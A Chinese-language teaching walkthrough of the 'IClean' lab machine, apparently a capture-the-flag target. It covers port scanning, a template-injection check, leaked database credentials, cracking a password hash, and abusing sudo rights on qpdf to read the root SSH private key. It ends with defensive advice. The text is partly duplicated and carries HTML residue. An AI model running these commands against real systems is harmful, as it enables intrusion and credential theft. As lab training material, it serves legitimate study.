IClean靶机渗透测试教学文档<\/h1>

1. 初始信息收集<\/h2>

1.1 主机发现与端口扫描<\/h3>

nmap -p- -sC -sV 10.10.11.12 -Pn --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>
-p-<\/code>：扫描所有端口(1-65535)<\/li>
-sC<\/code>：使用默认脚本扫描<\/li>
-sV<\/code>：探测服务版本<\/li>
-Pn<\/code>：跳过主机发现，直接扫描<\/li>
--min-rate 1000<\/code>：设置最小发包速率为1000包\/秒<\/li>
<\/ul>
1.2 添加主机名到hosts文件<\/h3>
echo "10.10.11.12 capiclean.htb"<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>2. Web应用枚举<\/h2>
2.1 目录爆破<\/h3>
gobuster dir --url "http:\/\/capiclean.htb"<\/span> --wordlist \/usr\/share\/seclists\/Discovery\/Web-Content\/common.txt
<\/span><\/span><\/code><\/pre>发现重要目录：<\/p>

\/quote<\/code>：服务订购提交页面<\/li>
<\/ul>
2.2 初步分析<\/h3>

服务订购页面不是查询服务，SQL注入可能性较低<\/li>
可能存在Python SSTI(服务器端模板注入)漏洞<\/li>
<\/ul>
3. XSS测试<\/h2>

<\/span><\/span><\/code><\/pre>
如果没有cookie则新建一个<\/li>
将path改为\/<\/code><\/li>
访问dashboard页面<\/li>
<\/ul>
4. 漏洞利用<\/h2>
4.1 订单生成流程<\/h3>

使用InvoiceGenerator<\/code>生成订单<\/li>
将生成的订单ID提交到QRGenerator<\/code>生成二维码<\/li>
扫描二维码获取账单<\/li>
<\/ol>
4.2 SSTI漏洞确认<\/h3>
在qr_link<\/code>参数中测试：<\/p>
{{4*4}}
<\/code><\/pre>
响应包中返回16<\/code>，确认存在SSTI漏洞<\/p>
4.3 源代码泄露<\/h3>
发现app.py<\/code>文件泄露，包含数据库配置：<\/p>
db_config =<\/span> {
<\/span><\/span>    'host'<\/span>: '127.0.0.1'<\/span>,
<\/span><\/span>    'user'<\/span>: 'iclean'<\/span>,
<\/span><\/span>    'password'<\/span>: 'pxCsmnGLckUb'<\/span>,
<\/span><\/span>    'database'<\/span>: 'capiclean'<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5. 数据库访问<\/h2>
5.1 连接数据库<\/h3>
mysql -u iclean -p
<\/span><\/span><\/code><\/pre>使用密码pxCsmnGLckUb<\/code><\/p>
5.2 查询用户数据<\/h3>
use capiclean;
<\/span><\/span>select<\/span> *<\/span> from<\/span> users;
<\/span><\/span><\/code><\/pre>获取到用户consuela<\/code>的密码哈希：

0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa<\/code><\/p>
5.3 破解哈希<\/h3>
echo "0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa"<\/span> > hash
<\/span><\/span>hashcat -m 1400<\/span> -a 0<\/span> hash \/usr\/share\/wordlists\/rockyou.txt
<\/span><\/span><\/code><\/pre>破解结果为：simple and clean<\/code><\/p>
6. 用户权限提升<\/h2>
6.1 切换用户<\/h3>
su consuela
<\/span><\/span><\/code><\/pre>使用密码simple and clean<\/code><\/p>
6.2 获取用户flag<\/h3>
cat \/home\/consuela\/user.txt
<\/span><\/span><\/code><\/pre>用户flag：e4fb54144493b2df71de87281902e002<\/code><\/p>
7. 提权至root<\/h2>
7.1 检查sudo权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>发现可以以root身份执行\/usr\/bin\/qpdf<\/code><\/p>
7.2 QPDF工具介绍<\/h3>
QPDF是一个用于处理PDF文件的命令行工具，功能包括：<\/p>

合并、拆分PDF<\/li>
解密、加密PDF<\/li>
旋转页面<\/li>
添加附件等<\/li>
<\/ul>
7.3 利用QPDF提取root私钥<\/h3>
sudo \/usr\/bin\/qpdf --empty \/tmp\/key.pdf --qdf --add-attachment \/root\/.ssh\/id_rsa --
<\/span><\/span><\/code><\/pre>
--empty<\/code>：创建空PDF<\/li>
--qdf<\/code>：启用QDF模式(便于修改)<\/li>
--add-attachment<\/code>：添加附件<\/li>
<\/ul>
7.4 查看提取的私钥<\/h3>
cat \/tmp\/key.pdf
<\/span><\/span><\/code><\/pre>7.5 使用私钥登录root<\/h3>
chmod 400<\/span> id_rsa
<\/span><\/span>ssh -i id_rsa root@10.10.11.12
<\/span><\/span><\/code><\/pre>7.6 获取root flag<\/h3>
cat \/root\/root.txt
<\/span><\/span><\/code><\/pre>root flag：e9f42fab26856026679cbcd1bb76b7ed<\/code><\/p>
8. 关键点总结<\/h2>

SSTI漏洞<\/strong>：通过二维码生成功能发现并验证了Python SSTI漏洞<\/li>
源代码泄露<\/strong>：获取到数据库配置信息<\/li>
数据库凭证<\/strong>：从源代码中提取数据库凭据并访问数据库<\/li>
密码破解<\/strong>：使用hashcat破解SHA256哈希<\/li>
特权提升<\/strong>：利用QPDF的附件功能提取root私钥实现提权<\/li>
<\/ol>
9. 防御建议<\/h2>

修复SSTI漏洞，对用户输入进行严格过滤<\/li>
避免在源代码中硬编码敏感信息<\/li>
使用强密码策略，避免使用弱密码<\/li>
限制sudo权限，避免过度授权<\/li>
对敏感文件(如SSH私钥)设置严格的权限控制<\/li>
<\/ol>

IClean靶机渗透测试教学文档<\/h1>

1. 初始信息收集<\/h2>

2. Web应用枚举<\/h2>

4. 漏洞利用<\/h2>

5. 数据库访问<\/h2>

9. 防御建议<\/h2> 修复SSTI漏洞，对用户输入进行严格过滤<\/li> 避免在源代码中硬编码敏感信息<\/li> 使用强密码策略，避免使用弱密码<\/li> 限制sudo权限，避免过度授权<\/li> 对敏感文件(如SSH私钥)设置严格的权限控制<\/li> <\/ol>

9. 防御建议<\/h2>

修复SSTI漏洞，对用户输入进行严格过滤<\/li>
避免在源代码中硬编码敏感信息<\/li>
使用强密码策略，避免使用弱密码<\/li>
限制sudo权限，避免过度授权<\/li>
对敏感文件(如SSH私钥)设置严格的权限控制<\/li> <\/ol>